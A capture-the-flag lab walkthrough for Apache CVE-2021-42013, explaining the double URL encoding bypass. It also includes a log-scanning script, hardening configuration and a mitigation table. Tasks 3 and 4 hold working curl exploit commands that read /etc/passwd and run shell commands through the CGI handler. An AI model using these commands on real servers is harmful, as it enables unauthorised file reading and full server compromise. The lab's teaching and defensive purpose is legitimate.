Apache CVE-2021-42013 – Path Traversal & Remote Code Execution Walkthrough
Quick Info
| Property | Value |
|---|---|
| Platform | CyberTask |
| Difficulty | Easy |
| Category | Web Exploitation / CVE |
| Tasks | 5 |
| Cost | Free |
| Access | Browser-based (No VPN required) |
Lab network topology: Your machine → Apache Server (TARGET_IP:8080)
TL;DR
This walkthrough covers CVE-2021-42013, a critical path traversal and remote code execution vulnerability in Apache HTTP Server versions 2.4.49 and 2.4.50. You’ll learn to exploit double URL encoding to bypass filters, read sensitive files like /etc/passwd, and achieve RCE through the CGI handler.
What You’ll Learn
- Understanding CVE-2021-42013 and its root cause
- Double URL encoding bypass techniques
- Path traversal exploitation using curl
- Remote code execution via CGI handler
- Reading sensitive system files from vulnerable servers
Prerequisites
- Basic understanding of HTTP and web servers
- Familiarity with command line (curl)
- A free CyberTask account
curl is pre-installed on Windows 10+, macOS, and Linux. No additional tools are required.
Task 1: Understanding CVE-2021-42013
CVE-2021-42013 is a path traversal and remote code execution vulnerability affecting Apache HTTP Server versions 2.4.49 and 2.4.50. This vulnerability emerged because the fix for an earlier vulnerability (CVE-2021-41773) was incomplete.
The Vulnerability
The flaw allows attackers to use double URL encoding to bypass Apache’s path traversal filters. Here’s how it works:
| Encoding Stage | Value | Description |
|---|---|---|
| Original | %%32%65 | Double-encoded dot |
| First decode | %2e | Single-encoded dot |
| Second decode | . | Literal dot character |
By encoding a dot (.) as %%32%65, attackers can climb out of the web root directory and access arbitrary files on the system.
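As an added example (not part of the lab), the following Python script applies the two decoding passes from the table above to the request path of each Apache access-log line and reports at which pass a `..` segment first appears, which is the check a defender would run over their own logs. The log lines are constructed samples and the function names are my own.

```python
import re
from urllib.parse import unquote

# The quoted request field of an Apache access-log line: "METHOD /path HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def decode_stages(path, passes=2):
    """Return [raw, after 1st decode, after 2nd decode]; mirrors the table's stages."""
    stages = [path]
    for _ in range(passes):
        stages.append(unquote(stages[-1]))  # '.%%32%65' -> '.%2e' -> '..'
    return stages

def has_dotdot_segment(path):
    """True if a '/'-separated segment of the path (query string dropped) is '..'."""
    return ".." in path.split("?", 1)[0].split("/")

def traversal_stage(path):
    """Index of the first decoding stage that exposes a '..' segment, or -1 if none.

    0 = literal '..', 1 = single-encoded (%2e, the CVE-2021-41773 pattern),
    2 = only visible after two passes (%%32%65, the CVE-2021-42013 pattern).
    """
    for i, stage in enumerate(decode_stages(path)):
        if has_dotdot_segment(stage):
            return i
    return -1

def scan_log(lines):
    """Return (method, raw_path, stage) for every logged request that traverses."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m is None:
            continue  # not a request line we can parse
        stage = traversal_stage(m.group("path"))
        if stage >= 0:
            hits.append((m.group("method"), m.group("path"), stage))
    return hits

# Constructed sample access-log lines (not real traffic); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2021:12:00:01 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326',
    '203.0.113.5 - - [10/Oct/2021:12:00:02 +0000] "GET /icons/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199',
    '203.0.113.5 - - [10/Oct/2021:12:00:03 +0000] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1419',
    '203.0.113.5 - - [10/Oct/2021:12:00:04 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 57',
]

if __name__ == "__main__":
    for method, path, stage in scan_log(SAMPLE_LOG):
        print(f"{method} {path} -> '..' exposed at decode stage {stage}")
```

Apache logs the request line as received, so the double-encoded form is visible in the raw log; the script deliberately reports the stage number so a plain `%2e` probe and a `%%32%65` probe can be distinguished.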
When RCE is Possible
When Apache has mod_cgi or mod_cgid enabled, this path traversal can be leveraged to reach /bin/sh and execute arbitrary commands on the server.
Impact
- Confidentiality: Read sensitive files (/etc/passwd, configuration files, source code)
- Integrity: Modify files if permissions allow
- Availability: Execute commands that could crash or compromise the server
Task 2: Identify Apache Version
Before exploitation, confirm the target is running a vulnerable Apache version.
Using curl to Check Version
Run the following command (replace <TARGET_IP> with your lab’s public IP from the network topology):
Linux/macOS:
```bash
curl -I http://<TARGET_IP>:8080/
```
Windows:
```powershell
curl.exe -I http://<TARGET_IP>:8080/
```
Expected Output
Look for the Server header in the response:
```
HTTP/1.1 200 OK
Date: ...
Server: Apache/2.4.50 (Unix)
...
```
A version of 2.4.49 or 2.4.50 confirms the server is vulnerable to CVE-2021-42013.
Task 3: Directory Traversal Proof-of-Concept
Now let’s exploit the path traversal vulnerability to read sensitive files.
Reading /etc/os-release
First, verify the vulnerability works by reading the OS release file:
Linux/macOS:
```bash
curl -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/os-release'
```
Windows:
```powershell
curl.exe -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/os-release'
```
Expected Output
```
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
...
```
Why It Works
Each %%32%65 sequence becomes . after two decoding passes, so every .%%32%65 segment turns into .. and the request climbs out of the icons directory (/../../../..) despite Apache's attempted filter. The --path-as-is flag stops curl from normalizing dot segments in the URL itself before sending it.
Your Task: Read /etc/passwd
Modify the command to read /etc/passwd and identify users with home directories:
Linux/macOS:
```bash
curl -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
```
Windows:
```powershell
curl.exe -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
```
Look for entries with /home/ directories:
```
user:x:1000:1000::/home/user:/bin/bash
```
Task 4: Remote Code Execution (RCE)
With mod_cgi enabled, we can escalate from path traversal to full remote code execution.
How RCE Works
The vulnerability allows us to invoke /bin/sh through the CGI handler. By sending a POST request with commands, we can execute arbitrary code on the server.
Step 1: List Files in Web Directory
Linux/macOS:
```bash
curl -v --data "echo;ls /usr/local/apache2/htdocs/" \
  'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
```
Windows:
```powershell
curl.exe -v --data "echo;ls /usr/local/apache2/htdocs/" 'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
```
This will list all files in the web directory, including a hidden flag file.
Step 2: Read the Flag
Once you identify the flag file, read its contents:
Linux/macOS:
```bash
curl -v --data "echo;cat /usr/local/apache2/htdocs/<FLAG_FILENAME>" \
  'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
```
Windows:
```powershell
curl.exe -v --data "echo;cat /usr/local/apache2/htdocs/<FLAG_FILENAME>" 'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
```
The echo; prefix is required to separate the command output from the shell's initial response: it emits the blank line the CGI handler expects between headers and body, so the output is returned instead of being rejected as malformed headers. You can chain multiple commands using ; or &&.
Task 5: Additional References
For deeper understanding of CVE-2021-42013, explore these resources:
- Walnut Security: Path Traversal & RCE in Apache
- Enciphers: Exploiting CVE-2021-42013
- Apache Security Advisory
- NVD CVE-2021-42013
Mitigation & Defense
If you’re a defender, here’s how to protect against CVE-2021-42013:
| Mitigation | Description |
|---|---|
| Update Apache | Upgrade to version 2.4.51 or later immediately |
| Disable CGI | If not needed, disable mod_cgi and mod_cgid |
| Require all denied | Ensure <Directory /> has Require all denied |
| WAF Rules | Deploy WAF rules to detect encoded path traversal |
| Monitor Logs | Watch for requests whose path contains encoded dot sequences such as %2e or %%32%65 |
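As an added example (not the lab's or the Apache project's own configuration), here is an httpd.conf fragment showing the weak settings beside the hardened ones from the table above. The document-root path /usr/local/apache2/htdocs is taken from the lab's commands; the module file names assume a stock httpd build and the exact paths may differ on your system.

```apache
# --- Weak: CGI enabled and the filesystem root reachable through Alias mappings ---
# LoadModule cgi_module modules/mod_cgi.so
# <Directory />
#     Require all granted
# </Directory>

# --- Hardened ---
# 1. Leave CGI modules unloaded unless they are actually needed (removes the RCE path).
#LoadModule cgi_module modules/mod_cgi.so
#LoadModule cgid_module modules/mod_cgid.so

# 2. Deny everything outside the document root by default, so a traversal that
#    escapes /icons or /cgi-bin lands in a denied directory instead of /etc or /bin.
<Directory />
    AllowOverride None
    Require all denied
</Directory>

# 3. Grant access explicitly and only to the document root.
<Directory "/usr/local/apache2/htdocs">
    Require all granted
</Directory>
```

None of this replaces the upgrade to 2.4.51 or later; it limits what a traversal can reach on a server that has not been patched yet.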
FAQ
What is CVE-2021-42013?
CVE-2021-42013 is a path traversal and remote code execution vulnerability in Apache HTTP Server 2.4.49 and 2.4.50. It allows attackers to read arbitrary files and execute commands by using double URL encoding to bypass security filters.
Why was the original fix incomplete?
The fix for CVE-2021-41773 only addressed single URL encoding. Researchers discovered that double encoding (%%32%65 instead of %2e) could bypass the filter, leading to CVE-2021-42013.
What versions are affected?
Only Apache HTTP Server versions 2.4.49 and 2.4.50 are vulnerable. Version 2.4.51 and later include the complete fix.
Is RCE always possible?
No. RCE requires mod_cgi or mod_cgid to be enabled. Without these modules, only path traversal (file reading) is possible.
How can I check if my server is vulnerable?
Check your Apache version with httpd -v or by examining the Server header in HTTP responses. If running 2.4.49 or 2.4.50, update immediately.
Conclusion
You’ve successfully exploited CVE-2021-42013, demonstrating how a simple encoding bypass can lead to complete server compromise. This vulnerability highlights the importance of thorough security testing and keeping software updated.
Key takeaways:
- Double URL encoding can bypass naive input filters
- Path traversal vulnerabilities can escalate to RCE
- Always update to the latest patched versions